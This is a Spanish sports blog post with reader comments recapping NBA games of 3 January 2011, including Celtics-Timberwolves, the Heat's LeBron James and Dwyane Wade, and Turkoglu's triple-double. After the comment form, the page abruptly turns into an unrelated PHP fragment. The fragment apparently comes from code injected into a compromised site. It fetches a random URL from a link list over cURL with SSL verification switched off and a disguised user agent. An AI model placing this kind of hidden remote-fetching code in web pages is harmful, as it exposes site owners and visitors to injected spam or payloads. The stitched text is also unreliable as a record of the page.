La Crónica (03/01/11)

04 de January de 2011 por TheDeerHunter

Sin sorpresas anoche, pero por un pelo… el que no tiene Ray Allen de tonto (ni de listo) para cerrar con un taponazo ganador a Ridnour una de esas remontadas épicas que parecen no costarles esfuerzo a los célticos (93-96). Antes de eso volvía Rondo al Garden como un bebé sobre los colosales brazos de Shaquille y el angelito lo celebró con 16 asistencias. Los Wolves vieron su oportunidad y trataron de hacer sangre. Ante uno o dos O’Neal, los que le pusieran delante, Love arrasó las zonas con 24 rebotazos (para un total de 15 de diferencia entre ambos equipos) y los Celtics acobardados tuvieron que tirar de defensa y de eficacia ofensiva. Fue suficiente.

Por su parte los Heat ganaron cómodos en Charlotte (96-82). Todo es más fácil cuando tienes a los dos mejores hombres de la jornada en tu equipo pero más aún si logras dejar a tu rival por debajo del 40% en tiro. Los Magic también estuvieron finos controlando a los Warriors (90-110), pero además mostraron un extraordinario juego en equipo, con 8 jugadores en dobles figuras, 17 rebotitos de Supermán y un triple doble de Turkoglu que no recordaban ni los más viejos del lugar… menos aún si incluye 14 rebotes en su haber.

Los Sixers también se estrellaron contra la gran defensa de los Hornets (77-84). Éstos no es que estuvieran grandiosos en ataque con un Chris Paul algo apagado pero por algo se empieza para volver a la senda de principio de campaña.

Finalmente los Nuggets necesitaron la mejor versión de si mismos para doblegar a los Rockets (106-113), lo mismo que les pasó a los Jazz en casa (97-102). McGrady rozó el triple doble…

PREMIOS

MVP: Lebron James se casca 38 puntos, 9 rebotes y 5 asistencias y Dwyane Wade 31 puntos, 11 rebotes y 4 asistencias. Habría que repasar las BD para encontrar dos actuaciones tan soberbias de dos compañeros de equipo.

Rookie: ¿Vale la pena destacar a algún rookie? Wes Johnson consiguió 8 puntos, 2 rebotes y 3 asistencias pero la noticia es que hoy nos hemos dado cuenta que Ekpe Udoh volvió a las canchas hace ya algunos partidos. Habrá que seguirle de cerca.

Sorpresa: Ha sido volver Turkoglu a Orlando y florecer de nuevo. Anoche registró su tercer triple doble de la carrera con 10 puntos, 14 rebotes y 10 asistencias.

Decepción: Debe ser muy duro ser rookie. Gordon Hayward no ha disfrutado de minutos durante toda la temporada pero había encadenado 3 buenos partidos consecutivos pareciendo que cogía confianza y que se podía convertir en una pieza importante para Utah.  Como premio, Sloan lo ha vuelto a condenar al fondo del banquillo.

MEV: McGrady se quedó a un rebote del triple doble y Tayshaun Prince se fue para casa con 26 puntos, 4 rebots y 5 asistencias. ¡Vivan los veteranos! (aunque pierdan)

Comenta

8 comentarios a esta entrada

  1. Cocinitas dice:
    #1

    Anoche vi el el Warriors-Magic, los Magic hicieron una gran segunda parte machacando a los warriors desde la linea de 3, me gusto mucho la aportacion de Arenas, Redick y Anderson desde el banco. Turkoglu hizo un triple doble ( quien lo imaginaria hace un mes ) y parece que le ha sentado fenomenal la vuelta a casa, aún asi se le ve falto de forma y ritmo. A Howard no lo vi bien deberia haberse comido el solo al juego interior de los warriors (falto David Lee) y no lo hizo.

      Citar

  2. Busky23 dice:
    #2

    Vaya vaya con la parejita…están destrozando a todos sus rivales,el ultimo cuarto de James ha sido brutal,a medida que avanza la temporada va afinando su tiro en suspensión,creo que los han elegido a los 2 jugadores del mes,unas máquinas.

    Hoy se ha vuelto a ver lo que denominan como “orgullo celtic”,entre Pierce (enorme la temporada del capi) Allen (donde ibas Ridnour??) han matado el partido. 
    El único pero,el rebote,al descanso,Kevin Love llevaba más rebotes que todos los Celtics juntos.

    Y Orlando,a diferencia de hace 2 semanas,todos aportan,ni mucho ni poco,pero colaboran. De Turkoglu prefiero no hablar,no lo puedo ni ver.

    Hoy me mojo. Los Spurs caen en el Madison.

      Citar

  3. GreenPride dice:
    #3

    Los Celtics sacaron otro partido adelante con orgullo y experiencia. Grandes problemas en el rebote como no se veían desde el año pasado (como se nota cuando no está Garnett). Como dije el dia de antes creo que este mes sufriran bastante ante las lesiones y el calendario que tienen. Cuando se vayan reincorporando los lesionados tendrán que darle minutos y eso puede costarles algunas derrotas. Veremos que pasa el miercoles contra los Spurs que llegaran cansados despues de su partido de esta noche en New York.
    El Este va a estar muy competido y divertido entre Celtics, Heat, Magic y Bulls.

      Citar

  4. -=TheKing=- dice:
    #4

    No es por decir nada, pero Turkoglu es un jugadorazo en los Magic, fuera un pakete pero en los Magic, se juega balones importantes y casi siempre con acierto.

      Citar

  5. Busky23 dice:
    #5

    No discuto su calidad,pero si su profesionalidad,este tipo de jugadores que solo dan el callo donde les interesa y donde no se ríen de la franquicia y de su afición no puedo con ellos que le vamos a hacer.

      Citar

  6. Denise dice:
    #6

    No sé que le pasa a Turkoglu, pero con la camiseta de los Magic se transforma en un crack, después lo ves con Turquía o con otros equipos donde ha estado, y parece un jugador del montón que hace numeros buenos a base de tirarse las zapatillas y manejar todo el tiempo la bola.
    Cocinitas….no sé que más quieres de Howard, en primer lugar no hizo falta que dominase la zona (según tú), y aún así tuvo más de un 75% de acierto tanto en tiros de campo como en tiros libres (notición), y cogió tantos rebotes como casi todos los hombres altos de Warriors.
    Por cierto, todos los Magic que jugaron ayer (sin contar a Quentin que jugó solo un minuto, gracias a Dios) por encima de los 10 puntos.
    Cada día me da mas asco ver los pasos flagrantes, como los de Ridnour, menos mal que Allen le taponó

      Citar

  7. gabrielj dice:
    #7

    en el apartado de los Rookies creo que hoy merece mención Greg Monroe, 14 puntos y 11 rebotes contra los Lakers con buenos porcentajes

      Citar

  8. Txusma dice:
    #8

    Gracias Gabriel. Se nos escapó el buen partido de Monroe.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>